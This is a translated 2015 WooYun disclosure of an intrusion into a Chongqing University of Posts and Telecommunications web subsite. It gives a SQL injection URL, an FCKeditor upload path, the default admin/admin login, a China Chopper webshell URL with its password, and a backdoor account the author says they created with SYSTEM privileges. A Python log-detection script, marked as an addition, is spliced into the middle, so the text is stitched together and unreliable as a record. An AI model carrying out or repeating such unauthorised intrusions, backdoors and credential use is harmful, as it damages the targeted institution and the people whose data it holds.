
Vulnerability summary

Defect ID: wooyun-2015-0102739

Title: Chongqing University of Posts and Telecommunications # collection of sub-site vulnerabilities leading to full compromise of the data

Vendor: Chongqing University of Posts and Telecommunications

Author: zhxs

Submitted: 2015-03-24 12:57

Fixed: 2015-03-29 12:58

Published: 2015-03-29 12:58

Vulnerability type: successful intrusion

Severity: high

Self-assessed Rank: 20

Status: handed over to a third-party partner organisation (CCERT education network emergency response team) for handling

Source: http://www.wooyun.org; for questions or help please contact [email protected]



Vulnerability details

Disclosure status:

2015-03-24: details sent to the vendor, awaiting vendor handling
2015-03-29: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Heh, last time the server got crashed and the report didn't pass, so I'm resubmitting it now.

Detailed description:

Target: http://ac.cqupt.edu.cn
There are tons of second-level directory sites under this domain.
Got a shell, and all the data on the whole server is KO'd.
#1: SQL injection
http://ac.cqupt.edu.cn/gclx/nav.php?cat_id=50
sqlmap turned up a number of tables.

#2: FCKeditor upload vulnerability
http://ac.cqupt.edu.cn/gclx//admin/fckeditor/editor/filemanager/connectors/uploadtest.html
#3: weak admin password
http://ac.cqupt.edu.cn/gclx/admin/
admin admin
#4: arbitrary file upload via the admin panel
System settings → Basic settings → Attachment upload, change the allowed upload file types

[screenshot: 1.png]


Can also browse and modify all the data on every data drive.
This is the most partitioned server I've ever seen: 8 drives.
I also found someone else's webshell from a long time ago. What has the admin been doing?
http://ac.cqupt.edu.cn/gclx/admin/uploads/media/1369642461_conf.php
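Every stage of the chain above leaves a trace in the web server's access log: sqlmap probing of `nav.php?cat_id`, hits on the FCKeditor connector path, and `.php` files appearing under `admin/uploads/`. As an added example that is not part of the original report, the following Python scans constructed log lines for those traces; the paths come from the report, while the log format and the token list are assumptions to be tuned for the site.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Mar/2015:12:10:01 +0800] "GET /gclx/nav.php?cat_id=50 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Mar/2015:12:10:02 +0800] "GET /gclx/nav.php?cat_id=50%27%20AND%201=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"
10.0.0.5 - - [24/Mar/2015:12:10:03 +0800] "GET /gclx/nav.php?cat_id=50)%20UNION%20SELECT%20NULL,NULL-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Mar/2015:12:11:00 +0800] "GET /gclx//admin/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Mar/2015:12:12:00 +0800] "POST /gclx/admin/uploads/media/1426668641_2.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Mar/2015:12:13:00 +0800] "GET /gclx/admin/uploads/media/photo.jpg HTTP/1.1" 200 90000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Crude SQL-injection token list (assumption: tune against the application's normal traffic).
SQLI_TOKENS = re.compile(r"(\bunion\b|\bselect\b|\b(?:and|or)\b\s+\d+=\d+|--|sleep\(|'|\")", re.I)
# The editor connector path and the upload directory are taken from the report.
FCK_CONNECTOR = re.compile(r"/fckeditor/editor/filemanager/connectors/", re.I)
SCRIPT_IN_UPLOADS = re.compile(r"/admin/uploads/.*\.(?:php\d?|phtml|asp|aspx|jsp)$", re.I)

def classify(line):
    """Return (ip, url, findings) for one log line; findings is empty for benign lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url, _, query = unquote(m.group("path")).partition("?")
    findings = []
    if "sqlmap" in m.group("ua").lower():
        findings.append("sqlmap_user_agent")
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        # id-style parameters should be plain integers, as cat_id=50 is.
        if key.endswith("id") and value and not value.isdigit():
            findings.append(f"non_numeric_id:{key}")
        if SQLI_TOKENS.search(value):
            findings.append(f"sqli_tokens:{key}")
    if FCK_CONNECTOR.search(url):
        findings.append("fckeditor_connector")
    if SCRIPT_IN_UPLOADS.search(url):
        findings.append("script_in_upload_dir")
    return m.group("ip"), url, findings

def scan(log_text):
    """Return only the lines that produced at least one finding."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit and hit[2]]

if __name__ == "__main__":
    for ip, url, findings in scan(SAMPLE_LOG):
        print(ip, url, ", ".join(findings))
```

A script request under the upload directory is the strongest signal here: on this site nothing legitimate should execute from `admin/uploads/`, so the upload handler should reject executable extensions server-side regardless of the admin-configurable type list.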

Proof of vulnerability:

China Chopper webshell
http://ac.cqupt.edu.cn/gclx/admin/uploads/media/1426668641_2.php
password:110
shell

[screenshot: 8.png]


SYSTEM privileges; an account has already been added: admini jyhack123
The server runs Safe Dog, which probably has a policy set that blocks remote access, so I'm not going further; I've already crashed it once.

[screenshot: 2.jpg]


All the data

[screenshot: 4.png]


That should be about enough.
Asking for 20 RANK.

Fix recommendation:

Safe Dog isn't configured properly and doesn't block injection; change the default passwords.
C:\RECYCLER\1.txt
The server has already had its hashes grabbed by a hacker; check it carefully = this Safe Dog of yours is pretty useless.

Copyright notice: please credit the source when reposting, zhxs@WooYun


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-03-29 12:58

Vendor reply:

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-03-24 14:14 | 泳少 ( regular white hat | Rank:231 vulnerabilities:79 | ★ Having set foot on the road of dreams, I'll crawl it if I have to...)

    Master, that's sharp!

  2. 2015-03-31 13:06 | zhxs ( intern white hat | Rank:32 vulnerabilities:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    First time I've heard of @CCERT教育网应急响应组 ignoring one too.

  3. 2015-04-17 20:02 | 沉沦哥 ( passerby | Rank:9 vulnerabilities:4 | Waiting is bliss, but I don't like waiting.)

    Damn. Why did you delete my webshell?

  4. 2015-04-17 20:04 | 君莫笑 ( passerby | Rank:15 vulnerabilities:13 | A cat who loves life)

    Classmate, don't mess around. So it was you who crashed the server,,,, damn, that scared me to death.

  5. 2015-04-18 20:00 | zhxs ( intern white hat | Rank:32 vulnerabilities:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    @君莫笑 ⊙﹏⊙‖∣ Really? 、、